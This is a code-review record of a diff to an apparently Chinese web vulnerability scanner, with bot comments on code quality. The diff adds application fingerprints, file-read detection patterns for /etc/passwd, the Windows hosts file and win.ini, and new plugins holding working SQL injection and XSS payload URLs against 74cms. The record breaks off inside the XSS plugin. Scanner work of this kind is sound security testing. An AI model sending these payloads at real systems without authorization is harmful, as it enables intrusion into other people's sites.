- application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
+ # application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
application.add_option('--shell', dest='shell', action='store_true', help=lang['application_help']['shell'])
application.add_option('--type', type='string', dest='vulnType', default=None, help=lang['application_help']['type'])
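Review bot: The `-a/--application` option is commented out rather than removed, leaving dead code the next reader has to reason about; delete the line, since version control keeps the history. With `-v` now the only selector, a short help note on how it matches would help — the examples above use both `httpd` and `cnvd-2018-24942`, which suggests a substring match on the payload name, but that is not visible here. Anything that still reads `config.get('application')` elsewhere would now see a missing key, so a grep before merging is worthwhile.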
@@ -72,6 +73,6 @@ def parse():
lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name'])
lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true')
- app_list = parser.add_option_group(lang['app_list_help']['title'], lang['app_list_help']['name'])
+ # app_list = parser.add_option_group(lang['app_list_help']['title'], lang['app_list_help']['name'])
return parser.parse_args()
\ No newline at end of file
diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py
index 177f655..c38ec1b 100644
--- a/lib/plugins/fingerprint/webapp.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -93,9 +93,9 @@ def identify(self, client):
return dedup_app_list
logger.info('yellow_ex', self.lang['core']['web_finger']['NotFind'])
- return None
+ return []
except:
- return None
+ return []
def __init__(self):
self.delay = config.get('delay')
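Review bot: The bare `except:` now returns `[]`, so a transport error or a bug in the matcher becomes indistinguishable from "no fingerprint matched" and the caller silently continues with an empty app list. Narrow it and record the failure, e.g. `except Exception as exc:` followed by a log call in the same shape as the `logger.info('yellow_ex', ...)` line just above (that signature is inferred from that line). A bare `except:` also swallows `KeyboardInterrupt`, which matters for a long-running scanner. `identify()` starts before this hunk.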
@@ -103,6 +103,20 @@ def __init__(self):
# * webapp指纹库
self.webapp_fingerprint = [
+ {
+ 'name': '74cms',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'骑士PHP高端人才系统(www\.74cms\.com)',
+ r'',
+ r'',
+ r'',
+ r'',
+ r'欢迎登录骑士人才系统!请.{10,70}登录.{10,70}或.{10,70}免费注册',
+ r'',
+ ]
+ },
{
'name': 'nacos',
'path': 'nacos/',
@@ -192,6 +206,15 @@ def __init__(self):
r'Apache2 package with Debian\. However, check.*existing bug reports'
]
},
+ {
+ 'name': 'httpd',
+ 'path': 'qwe',
+ 'data': '',
+ 'fingerprint': [
+ r'404 Not Found.*Not Found
.*The requested URL /qwe was not found on this server\.
',
+ r'Apache/.{1,30} Server at .{1,30} Port \d{0,6}',
+ ]
+ },
{
'name': 'skywalking',
'path': '',
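Review bot: The second pattern, `Apache/.{1,30} Server at .{1,30} Port \d{0,6}`, is the default `ServerSignature` footer, which is emitted by any host fronted by Apache — including reverse proxies in front of unrelated applications — and is absent on installs with `ServerSignature Off`, so the `httpd` tag will both over- and under-fire. Worth a comment on the entry stating that it identifies the front-end server, not the application, e.g. `# matches the Apache 404/ServerSignature footer; also fires for apps behind an Apache reverse proxy`. The first pattern depends on the stock English 404 body, which distribution builds often customise; if the matcher supports it, requiring both patterns would reduce false positives. The enclosing fingerprint list starts before this hunk.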
@@ -429,11 +452,20 @@ def __init__(self):
'data': '',
'fingerprint': [
r'Welcome to JBoss™',
+ r'Welcome to JBoss AS',
r'',
r'.*',
+ r'.*',
r'JBoss Online Resources
.*JBoss Management
',
r'JBoss Web Console',
r'JBoss™ Application Server
',
+ r'JBoss Web Services Console',
+ r'JBoss Application Server',
+ r'JBoss AS Documentation',
+ r'JBoss Wiki',
+ r'JBoss AS JIRA',
+ r'JBoss Forums',
+ r'JBoss Mailing Lists',
]
},
{
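Review bot: The added patterns `JBoss Wiki`, `JBoss Forums`, `JBoss Mailing Lists` and `JBoss Application Server` are plain phrases that can appear on any page linking to the JBoss community, not only on a JBoss AS welcome page; with substring matching this tags unrelated hosts as JBoss and then sends the `jboss-unauth` probes at them. Prefer the anchored forms already in the list (`Welcome to JBoss AS`, `JBoss Web Console`, `JBoss Web Services Console`), or, if the matcher supports it, require more than one hit before accepting the fingerprint. The enclosing fingerprint list starts before this hunk.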
@@ -634,7 +666,15 @@ def __init__(self):
r'十年磨一剑 - 为API开发设计的高性能框架',
r':\)',
r'ThinkPHP.*V.*',
- r'\d{0,3}载初心不改 - 你值得信赖的PHP框架'
+ r'\d{0,3}载初心不改 - 你值得信赖的PHP框架',
+ r' { Fast & Simple OOP PHP Framework } -- \[ WE CAN DO IT JUST THINK \]
',
+ r'/app/ThinkPHP/Library/Think/App\.class\.php\(',
+ r'/app/ThinkPHP/ThinkPHP\.php\(',
+ r'Think\\App::exec\(\)',
+ r'Think\\App::run\(\)',
+ r'Think\\Think::start\(\)',
+ r"require\('/app/ThinkPHP/T\.\.\.'\)",
+ r'ThinkPHP',
]
},
{
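Review bot: The new stack-trace patterns hard-code the `/app/ThinkPHP/...` prefix, which is the directory layout of the vulhub Docker images; a real deployment mounts the framework anywhere, so `r'ThinkPHP/Library/Think/App\.class\.php\('` and `r'ThinkPHP/ThinkPHP\.php\('` (prefix dropped) match the same trace without that assumption. The trailing catch-all `r'ThinkPHP'` matches any page that merely mentions the framework (a footer credit, a blog post) and makes every more specific pattern before it redundant; drop it, or mark it low-confidence if the matcher has such a tier. The enclosing fingerprint list starts before this hunk.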
@@ -646,7 +686,15 @@ def __init__(self):
r'十年磨一剑 - 为API开发设计的高性能框架',
r':\)',
r'ThinkPHP.*V.*',
- r'\d{0,3}载初心不改 - 你值得信赖的PHP框架'
+ r'\d{0,3}载初心不改 - 你值得信赖的PHP框架',
+ r' { Fast & Simple OOP PHP Framework } -- \[ WE CAN DO IT JUST THINK \]
',
+ r'/app/ThinkPHP/Library/Think/App\.class\.php\(',
+ r'/app/ThinkPHP/ThinkPHP\.php\(',
+ r'Think\\App::exec\(\)',
+ r'Think\\App::run\(\)',
+ r'Think\\Think::start\(\)',
+ r"require\('/app/ThinkPHP/T\.\.\.'\)",
+ r'ThinkPHP',
]
},
{
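Review bot: This fingerprint list is byte-for-byte the same as the one in the entry just above it, so every future pattern change has to be made twice — as this commit already had to. Lift it to a module-level `THINKPHP_FINGERPRINTS = [...]` and reference it from both entries. The same concerns about the hard-coded `/app/ThinkPHP/...` prefix (vulhub layout, not a general one) and the bare `r'ThinkPHP'` catch-all apply to this copy. The enclosing fingerprint list starts before this hunk.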
@@ -671,6 +719,18 @@ def __init__(self):
r''
]
},
+ {
+ 'name': 'vmware',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'',
+ r'
',
+ r'',
+ ]
+ },
{
'name': 'weblogic',
'path': '',
diff --git a/lib/plugins/shell.py b/lib/plugins/shell.py
index b74942e..304b92c 100644
--- a/lib/plugins/shell.py
+++ b/lib/plugins/shell.py
@@ -57,6 +57,10 @@ def __init__(self):
'System32(\\|%5c|%5C)?'\
'drivers(\\|%5c|%5C)?'\
'etc(\\|%5c|%5C)?hosts',
+ r'C:(/|%2f|%2F)?'\
+ 'Windows(/|%2f|%2F)?win.ini',
+ r'C:(\\|%5c|%5C)?'\
+ 'Windows(\\|%5c|%5C)?win.ini',
]
self.ssrf_old_payload_re_list = [
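Review bot: In both new patterns the `.` in `win.ini` is unescaped and so matches any character, unlike the rest of each expression where every separator is spelled out; write `'Windows(/|%2f|%2F)?win\.ini'` and `'Windows(\\|%5c|%5C)?win\.ini'`. The drive letter is also pinned to `C:` while the hosts patterns above accept the same; `[A-Za-z]:` would cover non-default system drives at no cost. The list these entries belong to starts before this hunk.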
diff --git a/lib/tool/check.py b/lib/tool/check.py
index 6ca1c31..6f782f4 100644
--- a/lib/tool/check.py
+++ b/lib/tool/check.py
@@ -4,10 +4,11 @@
'''
检查
无法连接至目标url
- 连接目标url超时
+ 连接目标url超时
检查poc误报
例如直接输出payload在页面中的情况
参考: https://github.com/zhzyker/vulmap/blob/main/core/verify.py
+ 检查文件读取漏洞
'''
from lib.initial.config import config
@@ -46,26 +47,29 @@ def check_res(resText, md, command='echo'):
def check_res_fileread(resText, resHeaders=None):
''' 检查回显, 判断是否存在 FileRead(任意文件读取) 漏洞
- :param resText: 响应文本Response.text
- :param resHeaders(可选参数): 响应头, 有时候回显可能在 响应Headers 里 而不在 响应Body 里
-
+ :param resText: 要检测的响应内容
+ :param resHeaders(可选参数): 要检测的响应头
+
* /etc/passwd
r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root'
* C:/Windows/System32/drivers/etc/hosts
'Microsoft Corp' and 'Microsoft TCP/IP for Windows'
+ * C:/Windows/win.ini
+ '; for 16-bit app support
'''
- if (
+ if ( # * 检查响应Body
re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', resText, re.I|re.M|re.S)
- or (('Microsoft Corp' in resText)
- and ('Microsoft TCP/IP for Windows' in resText))
+ or (('Microsoft Corp' in resText) and ('Microsoft TCP/IP for Windows' in resText))
+ or ('; for 16-bit app support' in resText)
):
- return True # * 文件回显在 响应Body里, 存在FileRead漏洞
- elif (
+ return True
+
+ elif ( # * 检查响应Headers
re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', str(resHeaders), re.I|re.M|re.S)
- or (('Microsoft Corp' in str(resHeaders))
- and ('Microsoft TCP/IP for Windows' in str(resHeaders)))
+ or (('Microsoft Corp' in str(resHeaders)) and ('Microsoft TCP/IP for Windows' in str(resHeaders)))
+ or ('; for 16-bit app support' in str(resHeaders))
):
- return True # * 文件回显在 响应Headers里, 存在FileRead漏洞
-
+ return True
+
return False # * 没有找到文件回显, 不存在FileRead漏洞
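Review bot: The body branch and the headers branch repeat the same three markers, so adding the `win.ini` marker had to be done twice in this hunk and any future marker will need the same; pull the checks into one helper and call it on both inputs. That also removes the `str(resHeaders)` on a `None` default, which currently searches the literal string `'None'` (harmless, but accidental). A why-comment on the `/etc/passwd` regex noting that it accepts both `root:x:0:0:root` and shadow-less `root:<hash>:0:0:root` lines would explain the `(x{1}|.*)` alternation.
```python
def _has_fileread_marker(text):
    """True if *text* carries a known fragment of /etc/passwd, the Windows hosts file or win.ini."""
    return bool(
        re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', text, re.I|re.M|re.S)
        or ('Microsoft Corp' in text and 'Microsoft TCP/IP for Windows' in text)
        or '; for 16-bit app support' in text
    )

def check_res_fileread(resText, resHeaders=None):
    # … unchanged: docstring …
    if _has_fileread_marker(resText):
        return True  # file contents echoed in the body
    if resHeaders is not None and _has_fileread_marker(str(resHeaders)):
        return True  # file contents leaked through a response header
    return False
```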
diff --git a/lib/tool/color.py b/lib/tool/color.py
index ea36260..c8a80ea 100644
--- a/lib/tool/color.py
+++ b/lib/tool/color.py
@@ -5,37 +5,37 @@
init() # * 初始化, 使Windows机器也能正常显示颜色
-def reset(s):
+def reset(s = ''):
return Fore.RESET + s
-def red(s): # * 红色
+def red(s = ''): # * 红色
return Fore.RED + s
-def green(s): # * 绿色
+def green(s = ''): # * 绿色
return Fore.GREEN + s
-def cyan(s): # * 青蓝
+def cyan(s = ''): # * 青蓝
return Fore.CYAN + s
-def black_ex(s): # * 黑色(高亮)
+def black_ex(s = ''): # * 黑色(高亮)
return Fore.LIGHTBLACK_EX + s
-def red_ex(s): # * 红色(高亮)
+def red_ex(s = ''): # * 红色(高亮)
return Fore.LIGHTRED_EX + s
-def green_ex(s): # * 绿色(高亮)
+def green_ex(s = ''): # * 绿色(高亮)
return Fore.LIGHTGREEN_EX + s
-def yellow_ex(s): # * 黄色(高亮)
+def yellow_ex(s = ''): # * 黄色(高亮)
return Fore.LIGHTYELLOW_EX + s
-def blue_ex(s): # * 蓝色(高亮)
+def blue_ex(s = ''): # * 蓝色(高亮)
return Fore.LIGHTBLUE_EX + s
-def magenta_ex(s): # * 紫色(高亮)
+def magenta_ex(s = ''): # * 紫色(高亮)
return Fore.LIGHTMAGENTA_EX + s
-def cyan_ex(s): # * 青蓝(高亮)
+def cyan_ex(s = ''): # * 青蓝(高亮)
return Fore.LIGHTCYAN_EX + s
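Review bot: PEP 8 puts no spaces around `=` in a default value, so these signatures should read `def reset(s=''):`, `def red(s=''):` and so on for the whole set. Since the default exists so a caller can emit just the escape code, a one-line docstring on the first function saying so (`"""Return the colour escape followed by *s*; call with no argument to emit only the escape."""`) documents the intent for all of them. Passing a non-`str` still raises `TypeError` from the concatenation, which is unchanged.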
diff --git a/payloads/74cms/74cms-v5.0.1-sqlinject.py b/payloads/74cms/74cms-v5.0.1-sqlinject.py
new file mode 100644
index 0000000..468efa6
--- /dev/null
+++ b/payloads/74cms/74cms-v5.0.1-sqlinject.py
@@ -0,0 +1,59 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入
+ 暂无编号
+ Payload: https://github.com/chaitin/xray/blob/master/pocs/74cms-sqli.yml
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import md5, random_int_1
+
+class Scan(Vuln_Scan):
+ def __init__(self):
+ self.payloads = [
+ {'path': 'index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'},
+ {'path': 'upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'},
+ ]
+
+ def POC(self, clients):
+ client = clients.get('reqClient')
+
+ vul_info = {
+ 'app_name': '74cms',
+ 'vul_type': 'SQLinject',
+ 'vul_id': '74cms-v5.0.1-sqlinject',
+ }
+
+ for payload in self.payloads:
+ randomNum = random_int_1(6) # * 随机6位数字
+
+ path = payload['path'].format(RANNUM=randomNum)
+
+ res = client.request(
+ 'get',
+ path,
+ allow_redirects=False,
+ vul_info=vul_info
+ )
+ if res is None:
+ continue
+
+ md = md5(str(randomNum), 31) # * 计算随机数字的md5值, 取31位(0-30)
+
+ if (md in res.text):
+ results = {
+ 'Target': res.url,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+ return None
+
+ def EXP(self, clients):
+ pass
+
+ def Start(self, clients):
+ return self.POC(clients)
+
\ No newline at end of file
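Review bot: `md = md5(str(randomNum), 31)` truncates to 31 characters without saying why; add `# extractvalue() reports at most 32 chars of the XPath string and the leading '~' (0x7e) takes one, so only 31 chars of the md5 survive in the error` so the next maintainer does not "fix" it to 32. The module docstring is in Chinese while the rest of the plugin is English-keyed; an English line such as `74cms 5.0.1: unauthenticated error-based SQL injection in AjaxPersonalController (no CVE/CNVD id assigned)` keeps the catalogue greppable. `EXP` is a bare `pass` and `Start` only ever calls `POC`; a docstring on `EXP` stating that this check has no exploit stage makes that look intentional rather than unfinished.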
diff --git a/payloads/74cms/74cms-v6.0.4-xss.py b/payloads/74cms/74cms-v6.0.4-xss.py
new file mode 100644
index 0000000..cd8ccbc
--- /dev/null
+++ b/payloads/74cms/74cms-v6.0.4-xss.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+74CMS-v6.0.4版本 帮助中心搜索框处存在XSS
+ 暂无编号
+ Payload: https://www.freebuf.com/vuls/284537.html
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import random_int_1
+
+randomNum = random_int_1(6)
+
+class Scan(Vuln_Scan):
+ def __init__(self):
+ self.payloads = [
+ {'path': 'index.php?m=&c=help&a=help_list&key=1%253csvg/onload%253dconfirm%2528{TEXT}%2529%253E2&__hash__=1'},
+ {'path': 'index.php?m=&c=help&a=help_list&key=137244gq1lw%253csvg/onload%253dconfirm%2528{TEXT}%2529%253Edutvxlqd4lq&__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88'},
+ ]
+
+ def POC(self, clients):
+ client = clients.get('reqClient')
+
+ vul_info = {
+ 'app_name': '74cms',
+ 'vul_type': 'XSS',
+ 'vul_id': '74cms-v6.0.4-xss',
+ }
+
+ for payload in self.payloads:
+ path = payload['path'].format(TEXT=randomNum)
+
+ res = client.request(
+ 'get',
+ path,
+ allow_redirects=False,
+ vul_info=vul_info
+ )
+ if res is None:
+ continue
+
+ md = '